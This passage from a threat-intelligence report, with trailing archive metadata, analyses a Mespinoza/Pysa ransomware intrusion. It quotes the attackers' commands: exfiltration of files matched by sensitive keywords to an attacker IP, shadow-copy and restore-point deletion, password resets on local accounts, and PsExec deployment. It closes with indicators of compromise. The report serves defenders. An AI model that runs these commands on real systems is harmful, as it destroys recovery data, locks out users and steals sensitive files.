the\r\ncompromised network as either a double-extortion attempt or to increase leverage in ransom payment negotiations.\r\nAccording to the ransomware’s ransom message displayed later in this blog, the actors threaten to upload these files to their\r\nwebsite or will sell them on the ‘darknet’ if the organization does not pay the ransom. This message suggests that the actors\r\nare using the exfiltrated files as leverage to increase the likelihood of the organization paying the ransom.\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 14 of 23\n\nWe visited the group’s leak site and found that the actors leaked archives of files supposedly exfiltrated from the victim\r\nnetworks. Each leak entry on the website includes the name of the organization, a date associated with the leak and a link to\r\neither a page hosting the leaked information or a Zip archive of files. At the time of this writing, 187 organizations were\r\nnamed and the dates of these leaks range from April 3, 2020 through April 29, 2021. The website also includes a description\r\nof the leaked files for 25 of the organizations, which were apparently written by the actor. In many of the descriptions, the\r\nactor refers to the impacted organization as their “partner,” as seen in the following example description:\r\nOur partners provide you with their transaction history, invoices and bank documents for viewing.\r\nDuring our analysis, the actors collected potentially sensitive files by running a PowerShell script that would enumerate files\r\non the system, ignoring files with specific file extensions and files in specific folders and sending files whose filename\r\ncontained one of 71 sub-strings. When a file of interest was found, the PowerShell script uses the\r\nSystem.Net.WebClient.UploadFile method to upload the file to a URL with the following structure:\r\n193.34.166[.]92/upload-wekkmferokmsdderiuheoirhuiewiwnijnfrer?token=\u003cbase64 token value\u003e\u0026id=\u003cunique number for\r\norganization\u003e\u0026fullPath=\u003cpath on disk of file exfiltrated\u003e\r\nThe PowerShell script identifies files of interest by comparing the filename to the 71 sub-strings seen in Table 6. The sub-strings would suggest the actors are interested in gathering a variety of different types of information, including documents\r\nrelated to finances, account credentials, government, employees and other personal identifiable information (PII). Several of\r\nthe sub-strings, such as illegal, fraud and criminal, suggest that the actors are also interested in illegal activities known to the\r\norganization as well.\r\nsecret checking illegal bureau billing sec\r\nprivate saving compromate government payment soc\r\nconfident routing privacy securit budget vendor\r\nimportant finance login unclassified criminal tax\r\nfederal agreement credent seed bank emplo\r\ngovernment SWIFT private personal cash hir\r\nsecurity compilation contract partner payroll ssn\r\nfraud report concealed confident password tax\r\nsecret confident clandestine mail driver*license i-9\r\nbalance hidden investigation letter license*driver w-9\r\nstatement clandestine federal passport scans w-4\r\npay Staf SSA Emplo Confid\r\nTable 6 Substrings used to identify files of interest to exfiltrate\r\nWhen generating a list of files to exfiltrate, the PowerShell script will disregard files based on their file extension if they\r\nmatch the list in Table 7. One could speculate which file types the threat actors were most interested in, as the list of\r\nexcluded file extensions does not include common extensions associated with productivity software, such as “.docx,” “.doc”\r\nand “.pdf.” We believe the threat actors are most interested in document files as they are more likely to contain the sensitive\r\ninformation the actors seek when compared to file types in the exclusion list. There are also errors in the extension exclusion\r\nlist, specifically the “. rpt” entry that contains the space character that is not allowed in a file extension.\r\n.png .evtx .gif .man .pls .trn .ascx .suo .jss\r\n.jpg .rb .log .template .checksum .ipa .application .vsix .jsm\r\n.txt .htm* .url .xsd .cdf-ms .procedure .cls .wsdl .ico\r\n.py .jar .lnk .aspx .cmd .vb .deploy .tt .function\r\n.pyc .dat .cs .h . rpt .cshtml .DIC .cch .hlp\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 15 of 23\n\n.dll .ini .json .cab .php .config .rll .chw .ldf\r\n.exe .xrm-ms .bak .Pid .svc .chm .so .epub .map\r\n.js .xml .md .frm .java .msp .table .form .mof\r\n.css .swf .manifest .msi .class .msm .tmp .function .mp3\r\n.msg .nupkg\r\nTable 7. File extensions ignored in identifying files of interest.\r\nLastly, the PowerShell script ignores files stored in the folders and sub-folders that match the sub-strings listed in Table 8.\r\nThese folders are omitted from consideration as they are related to the Windows operating system, application files,\r\nbrowsers and antivirus products, which would unlikely contain any sensitive files of interest to the actors.\r\nWindows Package Cache PerfLogs\r\nSymantec VMware Recovery\r\nChrome Microsoft Boot\r\nMozilla Sophos Program Files\r\nESET System Volume Information ProgramData\r\nTable 8. Folders ignored in identifying files of interest.\r\nDeployment\r\nTo deploy Mespinoza, the actor used three batch scripts that would use PsExec to copy files to, and to run commands on,\r\nother systems on the network. The actors use one system as a distribution point and run the three batch scripts from this\r\nsystem to spread to other systems on the network. The three scripts carry out the following tasks:\r\n1. Use PsExec to run a PowerShell script located on a shared folder on the distribution server.\r\n2. Use PsExec to run the copy command to copy the Mespinoza ransomware from the shared folder on the distribution\r\nserver to C:\\Windows\\Temp\\svchost.exe to other systems on the network.\r\n3. Use PsExec to run the copied ransomware sample by running cmd /c c:\\windows\\temp\\svchost.exe\r\nThe initial PowerShell script is meant to precede the ransomware deployment, specifically to disable antivirus, enable\r\nremote desktop and to modify the system to maximize the impact of the ransomware. First, the pre-deployment PowerShell\r\nscript attempts to specifically disable or remove both MalwareBytes and Windows Defender antivirus software from the\r\nsystem. The script then attempts to stop services that have specific sub-strings in their display name, as seen in Table 9.\r\nThese service names suggest the actors wish to run their ransomware after database, email and backup services are disabled\r\nwith the hope that the ransomware would encrypt the files used by these services.\r\nSQL Exchange Sharepoint\r\nOracle Veeam Quest\r\nCitrix Malwarebytes Backup\r\nTable 9. Processes killed by Mespinoza pre-deployment script.\r\nThe script also uses Windows Management Instrumentation command (wmic) to find and kill processes whose process name\r\nhas sub-strings seen in Table 10. The process names that the script attempts to kill include popular browsers, endpoint\r\nprotection, productivity, database and server processes.\r\nAgent Backup apache office manage\r\nMalware QuickBooks web anydesk acronis\r\nEndpoint QBDB vnc protect endpoint\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 16 of 23\n\nCitrix QBData teamviewer secure autodesk\r\nsql QBCF OCS Inventory segurda database\r\nSQL server monitor center adobe\r\nVeeam citrix security agent java\r\nCore.Service sage def silverlight logmein\r\nMongo http dev exchange microsoft\r\nsolarwinds engine AlwaysOn Framework sprout\r\nfirefox chrome barracuda veeam arcserve\r\nTable 10. Processes killed by Mespinoza pre-deployment script.\r\nThe PowerShell script also attempts to delete the system's restore point and volume shadow copies via the following\r\ncommands:\r\nGet-ComputerRestorePoint | Delete-ComputerRestorePoint\r\nvssadmin delete shadows /all /quiet\r\nThe script also attempts to further impact the ability to use systems by changing the password of the local user accounts on\r\nthe system. To carry this out, the PowerShell script obtains a list of local user accounts on the current system by running the\r\nfollowing command:\r\nGet-WmiObject -Class Win32_UserAccount -ComputerName $env:COMPUTERNAME -Filter LocalAccount='true' | select\r\n-ExpandProperty name\r\nIt then iterates through all of the local user accounts and appends the string pysa to the username, generates the MD5 hash of\r\nthe resulting string and sets the user’s password to the first 13 characters of the MD5 hash by running the following\r\ncommand:\r\n([adsi]\"WinNT://$env:COMPUTERNAME/$user\").SetPassword(\"$pass\");\r\nTo determine if the pre-deployment script successfully ran on the end system, the actor added a command that will create a\r\nfile in a shared folder on the distribution system with the name of the system the pre-deployment script ran on. The\r\ncommand would write “I'll be back.” to this file, which suggests that the actor expects to revisit the system to deploy the\r\nransomware. The PowerShell command that performs this functionality appears as follows, of which “[redacted]” replaces\r\nthe IP address of the distribution system:\r\nNew-Item -Path \"\\\\[redacted]\\log$\" -Name \"$name.txt\" -ItemType \"file\" -Value \"I'll be back.\";\r\nRansomware\r\nMespinoza ransomware starts by creating a mutex Pysa, of which Pysa is another alias for this ransomware family. It then\r\nenumerates the file system and writes the following ransom message to a file named Readme.README in each folder:\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 17 of 23\n\nFigure 10. Mespinoza ransomware note.\r\nFigure 10. Mespinoza ransomware note.\r\nThe ransomware will omit writing the ransom message and will not encrypt files in folders that have the following within\r\ntheir path:\r\n:\\Windows\\\r\n\\Boot\\\r\n\\BOOTSECT\r\n\\pagefile\r\n\\System Volume Information\\\r\nbootmgr\r\n\\Recovery\r\n\\Microsoft\r\nThe ransomware also writes values to the registry to display the ransom message at system startup. The ransomware edits\r\ntwo registry keys in SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System, specifically setting the\r\nlegalnoticecaption value to PYSA and legalnoticetext to the same ransom message above.\r\nThe ransomware will encrypt files using a RSA public key and the AES-CBC cipher, after which it will rename the\r\nencrypted file to change its file extension to .pysa. Before encrypting each file, the ransomware checks the file's extension\r\nagainst the following exclusion list:\r\n.README .docx .myd .backupdb .vfd .vbm\r\n.pysa .xlsx .ndf .bck .avhdx .vrb\r\n.exe .pdf .sdf .bkf .vmcx .win\r\n.dll .db .trc .bkup .vmrs .pst\r\n.sys .db3 .wrk .bup .pbf .mdb\r\n.search-ms .frm .001 .fbk .qic .7z\r\n.sql .ib .acr .mig .sqb .zip\r\n.doc .mdf .bac .spf .tis .rar\r\n.xls .mwb .bak .vhdx .vbk .cad\r\n.dsd .dwg .pla .pln\r\nTable 11. Encryption exclusion list using file extensions.\r\nThe ransomware finishes by creating a batch script at %TEMP%\\update.bat with the following contents, that it will run to\r\ndelete the ransomware and batch script from the system:\r\n:Repeat\r\ndel \"\u003cransomware filename\u003e.exe\"\r\nif exist \"\u003cransomware filename\u003e.exe\" goto Repeat\r\nrmdir \"\u003cfolder containing ransomware\u003e\"\r\ndel %TEMP%\\update.bat\r\nRelated Tools\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 18 of 23\n\nIt appears that actors have been using a combination of the pre-deployment PowerShell script prior to deploying Mespinoza\r\nransomware since at least March 2021. We found another pre-deployment script ‘p.ps1’ (SHA256:\r\n7193d6f3c621596e845694c1348e90ea5a9d99d756c9e9fe5063860cd1ee3838) used prior to a Mespinoza/Pysa ransomware\r\n(SHA256: 90cf35560032c380ddaaa05d9ed6baacbc7526a94a992a07fd02f92f371a8e92) that used the following email\r\naddresses within the ransom message:\r\nluebegg8024@onionmail[.]org\r\nmayakinggw3732@onionmail[.]org\r\nlauriabornhat7722@protonmail[.]com\r\nWe found that the IP address 89.44.9[.]229 hosted a Gasket and MagicSocks sample the first week of September 2020. At\r\nthe same time, this server also hosted two PowerShell scripts that gave us additional insight into the threat actors using these\r\ntools. The actors would likely use both of the scripts during their post-exploitation activities, specifically related to\r\ncredential harvesting and to support lateral movement.\r\nOne of the scripts had a filename of keke.ps1, which is a modified version of Invoke-Kerberoast with the comments and all\r\nof the lines that print messages to the screen removed (Write-Verbose). The actor renamed the Invoke-Kerberoast function to\r\nmommm, which is run and will output its results to a file at the path C:\\Users\\Public\\logs. The actors removed the ability for\r\nthe script to output the gathered hashes as “John the Ripper” format, which suggests the threat actors removed this code in\r\nfavor of using the hashcat output format. Therefore, we believe this threat group would exfiltrate the C:\\Users\\Public\\logs\r\nfile and would use the hashcat tool to try to extract credentials.\r\nThe second PowerShell script had a filename of try.ps1, which attempts to split a file at the hardcoded path of\r\nC:\\Users\\Public\\lsass.zip into 5MB blocks. The script would write each of these blocks files with .[number].part appended to\r\nthe filename. This script suggests that this group may dump the Local Security Authority Subsystem Service (LSASS)\r\nprocess’ memory and wishes to exfiltrate smaller files for credential harvesting on a remote system.\r\nConclusion\r\nIn a recent incident, threat actors deployed the Mespinoza (also known as Pysa) ransomware by accessing a system via\r\nremote desktop and running a series of batch scripts that use the PsExec tool to copy and execute the ransomware on other\r\nsystems on the network. Before deploying the ransomware to other systems, the actor runs PowerShell scripts on the other\r\nsystems on the network to exfiltrate files of interest and to maximize the impact of the ransomware.\r\nMespinoza attacks, such as those documented in this report, highlight multiple trends currently occurring amongst multiple\r\nransomware threat actors and families that clearly enable their attacks, and make them easy and simple to use in their\r\nattacks. As with other ransomware attacks, Mespinoza originates through the proverbial front door -- internet-facing RDP\r\nservers -- mitigating the need to craft phishing emails, perform social engineering, leverage software vulnerabilities or other\r\nmore time-consuming and costly activities. Further costs are saved through the use of numerous open-source tools available\r\nonline for free, or through the use of built-in tools enabling actors to live off the land, all of which benefits bottom line\r\nexpenses and profits.\r\nFinding RDP servers on the internet can be easily automated. The 2021 Cortex Xpanse Attack Surface Threat Report found\r\nRDP was the most common security issue found among global enterprises, representing 32% of overall security issues.\r\nPalo Alto Networks Next-Generation Firewall customers are protected from Mespinoza, Gasket and MagicSocks via the\r\nfollowing protections:\r\nAll known Gasket HTTP C2 traffic are detected in Threat Prevention.\r\nAll known Mespinoza, Gasket and MagicSocks samples receive malicious verdicts in WildFire.\r\nAll known Gasket and MagicSocks C2 domains have malicious verdicts in Advanced URL Filtering and are\r\nclassified as Command \u0026 Control in PAN-DB.\r\nAll known domains for Gasket and MagicSocks C2 are detected in DNS Security.\r\nCortex XDR customers are protected through WildFire verdicts for all known Mespinoza, Gasket and MagicSocks samples\r\nand by Local Analysis for Gasket samples.\r\nAutoFocus customers can track the ransomware and associated tools used in this attack via the Mespinoza and Gasket tags.\r\nCortex Xpanse customers can assess and manage their network security attack surface and generate an inventory of their\r\nsystems.\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 19 of 23\n\nIndicators of Compromise\r\nGasket SHA256\r\n356671767c368e455f2261f7f76d9ee9bd0b522172490845b89281224ab5dbad\r\n5d8459c2170c296288e2c0dd9a77f5d973b22213af8fa0d276a8794ffe8dc159\r\n64b9b5874820ca26344c919b518d6c0599a991aaf1943a519da98d294bebf01f\r\na30e605fa404e3fcbfc50cb94482618add30f8d4dbd9b38ed595764760eb2e80\r\nb0629dcb1b95b7d7d65e1dad7549057c11b06600c319db494548c88ec690551e\r\nccfa2c14159a535ff1e5a42c5dcfb2a759a1f4b6a410028fd8b4640b4f7983c1\r\n0bcbc1faec0c44d157d5c8170be4764f290d34078516da5dcd8b5039ef54f5ca\r\n85c8ccf45cdb84e99cce74c376ce73fdf08fdd6d0a7809702e317c18a016b388\r\n8b5cdbd315da292bbbeb9ff4e933c98f0e3de37b5b813e87a6b9796e10fbe9e8\r\n701791cd5ed3e3b137dd121a0458977099bb194a4580f364802914483c72b3ce\r\naa2faf0f41cc1710caf736f9c966bf82528a97631e94c7a5d23eadcbe0a2b586\r\nd591f43fc34163c9adbcc98f51bb2771223cc78081e98839ca419e6efd711820\r\nef31b968c71b0e21d9b0674e3200f5a6eb1ebf6700756d4515da7800c2ee6a0f\r\nf8a5065eb53b1e3ac81748176f43dce1f9e06ea8db1ecfa38c146e8ea89fcc0b\r\n12b927235ab1a5eb87222ef34e88d4aababe23804ae12dc0807ca6b256c7281c\r\n045510eb6c86fc2d966aded8722f4c0e73690b5078771944ec1a842e50af4410\r\n6eb0455b0ab3073c88fcba0cad92f73cc53459f94008e57100dc741c23cf41a3\r\n2697bbe0e96c801ff615a97c2258ac27eec015077df5222d52f3fbbcdca901f5\r\nf5cb94aa3e1a4a8b6d107d12081e0770e95f08a96f0fc4d5214e8226d71e7eb7\r\n3a6ddc4022f6abe7bdb95a3ba491aaf7f9713bcb6db1fbaa299f7c68ab04d4f4\r\n7b5027bd231d8c62f70141fa4f50098d056009b46fa2fac16183d1321be04768\r\ne47a632bfd08e72d15517170b06c2de140f5f237b2f370e12fbb3ad4ff75f649\r\n8a9205709c6a1e5923c66b63addc1f833461df2c7e26d9176993f14de2a39d5b\r\n0fd13ece461511fbc129f6584d45fea920200116f41d6097e4dffeb965b19ef4\r\n6d1fde9a5963a672f5e4b35cc7b8eaa8520d830eb30c67fadf8ab82aeb28b81a\r\n89b9ba56ebe73362ef83e7197f85f6480c1e85384ad0bc2a76505ba97a681010\r\nc9bed25ab291953872c90126ce5283ce1ad5269ff8c1bca74a42468db7417045\r\naf97b35d9e30db252034129b7b3e4e6584d1268d00cde9654024ce460526f61e\r\n1b888acb22a8326bd5f80f840390182d00e0c8db416d29d042358b48d1220438\r\n9986b6881fc1df8f119a6ed693a7858c606aed291b0b2f2b3d9ed866337bdbde\r\nea3b35384e803bef3c02a8f27aea2c2a40f9a4d2726113e1c5f2bc3be9c41322\r\nd9c753b859414e4b38a0841423b159590c47ad580249b0cd3c99a0ecc6644914\r\n30bd30642bf83abd74b8b2312ea606e0f192b0d61351f1445d1a1458414992d3\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 20 of 23\n\n140224fb7af2d235e9c5c758e8acaee34c912e62fad625442e5ca4102d11e9e7\r\nc2ef84710937b622f35b2b8fab9f9aa86b718ba7bc77a40b33b92e40747676b5\r\nGasket C2\r\n160.20.147[.]184\r\n172.96.189[.]167\r\n172.96.189[.]22\r\n172.96.189[.]246\r\n185.183.96[.]147\r\n185.185.27[.]3\r\n185.186.245[.]85\r\n193.239.84[.]205\r\n193.239.85[.]55\r\n194.187.249[.]102\r\n194.187.249[.]138\r\n194.5.249[.]137\r\n194.5.249[.]138\r\n194.5.249[.]139\r\n194.5.249[.]18\r\n194.5.249[.]180\r\n194.5.250[.]151\r\n194.5.250[.]162\r\n194.5.250[.]216\r\n198.252.100[.]37\r\n23.83.133[.]136\r\n37.120.140[.]184\r\n37.120.140[.]247\r\n37.120.145[.]208\r\n37.221.113[.]66\r\n45.89.175[.]239\r\n45.147.228[.]49\r\n45.147.229[.]29\r\n45.147.230[.]162\r\n45.147.230[.]212\r\n86.106.20[.]144\r\n89.38.225[.]208\r\n89.41.26[.]173\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 21 of 23\n\naccounting-consult[.]xyz\r\nblitzz[.]best\r\ncvar99[.]xyz\r\ndowax[.]xyz\r\nenglish-breakfast[.]xyz\r\nenglishdialoge[.]xyz\r\nenglishdict[.]xyz\r\nfirefox-search[.]xyz\r\nntservicepack[.]com\r\nproductoccup[.]tech\r\npump-online[.]xyz\r\nreportservicefuture[.]website\r\nsbvjhs[.]club\r\nsbvjhs[.]xyz\r\nserchtext[.]xyz\r\nspm[.]best\r\nstarhouse[.]xyz\r\nstatistics-update[.]xyz\r\ntransnet[.]wiki\r\nvisual-translator[.]xyz\r\nwiki-text[.]xyz\r\nccenter[.]tech\r\ndowax[.]xyz\r\nenglish-breakfast[.]xyz\r\nMagicSocks SHA256\r\n2f190f0a3a0f34113affc9edd02b9cacd0eb32cadb1d30a772aa0108e607dd5e\r\nd0b9124bc424982f52ac2af2ebbfbd343f224549543fcf77645c00e4c2c394a0\r\n04c44183426102b395679b009dfa194b648ce541dfb7a04f8e6f76571d8ac5d9\r\n0962cff47f985d5d8202b3cf73752f7e340f87ca82496618c28d37a666376d42\r\nf354b12bc070db12f1e6e9bb60acbb14e067f3469a1d560127256c999e80fd39\r\n0b29bce75c909b67f674b64cc42c5f6b57efae61bbfb071420cc47aa32b4881c\r\nMagicSocks C2\r\ncreatordampfe[.]xyz\r\n104.168.164[.]195\r\n172.96.189[.]86\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 22 of 23\n\n142.79.237[.]163\r\n23.227.206[.]158\r\nPre-Deployment Script\r\n897f5a1f4194f5c874547fdcd265de745a1e46da8077c7b68a3ea20f0a404bd0\r\n85761bf03d96111b90954cc8a5d38e250097ec649dd82ebd20946d03dec16714\r\na30f82a95519a55b58c25fa726934dad421ec5dac382be640a9ff016d9da44c7\r\n7193d6f3c621596e845694c1348e90ea5a9d99d756c9e9fe5063860cd1ee3838\r\n0951ca2d4ab7bec16a4145f757a59b0d1acdf3343e862ffa88f2d3f2243362bb\r\nRelated Mespinoza/PYSA SHA256\r\n90cf35560032c380ddaaa05d9ed6baacbc7526a94a992a07fd02f92f371a8e92\r\n44f1def68aef34687bfacf3668e56873f9d603fc6741d5da1209cc55bdc6f1f9\r\nRelated PowerShell Scripts SHA256\r\nf6ccf438c73e4e5ec91c62ffaf6a06aa316fc1ac8efbe903a4d689af47e14877\r\n5c31e73c7796e37a6f604fa0a588a8d3c9289191a7d60c47c8a5ac3f58e24233\r\nSource: https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nhttps://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/\r\nPage 23 of 23", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/" ], "report_names": [ "gasket-and-magicsocks-tools-install-mespinoza-ransomware" ], "threat_actors": [], "ts_created_at": 1775434094, "ts_updated_at": 1775791199, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/dbcc4e49360b245b8cbdfe54aed9bda18ce879a1.pdf", "text": "https://archive.orkl.eu/dbcc4e49360b245b8cbdfe54aed9bda18ce879a1.txt", "img": "https://archive.orkl.eu/dbcc4e49360b245b8cbdfe54aed9bda18ce879a1.jpg" } }